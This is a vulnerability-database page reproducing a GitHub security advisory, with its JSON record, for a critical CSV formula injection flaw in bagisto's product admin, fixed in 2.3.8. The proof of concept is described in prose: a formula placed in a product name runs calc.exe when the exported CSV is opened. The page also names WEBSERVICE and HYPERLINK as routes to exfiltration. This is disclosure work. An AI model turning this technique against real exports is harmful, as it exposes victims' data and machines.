GHSA-JQRP-58FV-W8CQ

Vulnerability from github – Published: 2025-10-16 20:48 – Updated: 2025-10-16 20:48
VLAI?
Summary
bagisto has CSV Formula Injection in Create New Product
Details

Summary

When product data that begins with a spreadsheet formula character (for example =, +, -, or @) is accepted and later exported or saved into a CSV and opened in spreadsheet software, the spreadsheet will interpret that cell as a formula. This allows an attacker to supply a CSV field (e.g., product name) that contains a formula which may be evaluated by a victim’s spreadsheet application — potentially leading to data exfiltration and remote command execution (via older Excel exploits / OLE/cmd constructs or Excel macros).

Details

Spreadsheet applications treat cell text that begins with characters =, +, -, @ as formulas. If unescaped, spreadsheet will interpret and evaluate the content when the file is opened. The application fails to neutralize/escape leading formula characters when generating CSV or when accepting CSV import fields for display/export.

PoC

Insert CSV formula to the product name field, and save the changes. Export it to CSV file, open it and the calc.exe will be executed. Other CSV export functions are affected as well. http://127.0.0.1/admin/catalog/products/edit/1 image image

Impact

Data exfiltration: Using spreadsheet functions (e.g., WEBSERVICE, HYPERLINK, or concatenation to create requests) on victims' machines that make network calls. Remote command execution: In some historical cases, specially crafted formulas and older Excel behaviors can lead to RCE. Modern Excel hardens many of these, but risk remains depending on environment.

Severity ?
9.0 (Critical)
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H
Show details on source website
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.3.7"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "bagisto/bagisto"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.3.8"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-62417"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1236"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-10-16T20:48:11Z",
    "nvd_published_at": null,
    "severity": "CRITICAL"
  },
  "details": "### Summary\nWhen product data that begins with a spreadsheet formula character (for example =, +, -, or @) is accepted and later exported or saved into a CSV and opened in spreadsheet software, the spreadsheet will interpret that cell as a formula. This allows an attacker to supply a CSV field (e.g., product name) that contains a formula which may be evaluated by a victim\u2019s spreadsheet application \u2014 potentially leading to data exfiltration and remote command execution (via older Excel exploits / OLE/cmd constructs or Excel macros).\n\n### Details\nSpreadsheet applications treat cell text that begins with characters =, +, -, @ as formulas. If unescaped, spreadsheet will interpret and evaluate the content when the file is opened. The application fails to neutralize/escape leading formula characters when generating CSV or when accepting CSV import fields for display/export.\n\n### PoC\nInsert CSV formula to the product name field, and save the changes. Export it to CSV file, open it and the calc.exe will be executed. Other CSV export functions are affected as well.\nhttp://127.0.0.1/admin/catalog/products/edit/1\n\u003cimg width=\"408\" height=\"302\" alt=\"image\" src=\"https://github.com/user-attachments/assets/2c6fd1e3-6725-4bf4-9c64-20cd57f4e279\" /\u003e\n\u003cimg width=\"1696\" height=\"854\" alt=\"image\" src=\"https://github.com/user-attachments/assets/911a69ae-65ac-4a8a-ad8e-63571a9610c8\" /\u003e\n\n### Impact\nData exfiltration: Using spreadsheet functions (e.g., WEBSERVICE, HYPERLINK, or concatenation to create requests) on victims\u0027 machines that make network calls.\nRemote command execution: In some historical cases, specially crafted formulas and older Excel behaviors can lead to RCE. Modern Excel hardens many of these, but risk remains depending on environment.",
  "id": "GHSA-jqrp-58fv-w8cq",
  "modified": "2025-10-16T20:48:11Z",
  "published": "2025-10-16T20:48:11Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/bagisto/bagisto/security/advisories/GHSA-jqrp-58fv-w8cq"
    },
    {
      "type": "WEB",
      "url": "https://github.com/bagisto/bagisto/commit/8076c708498a0187bc952d5f5f705e0cb1919682"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/bagisto/bagisto"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "bagisto has CSV Formula Injection in Create New Product"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.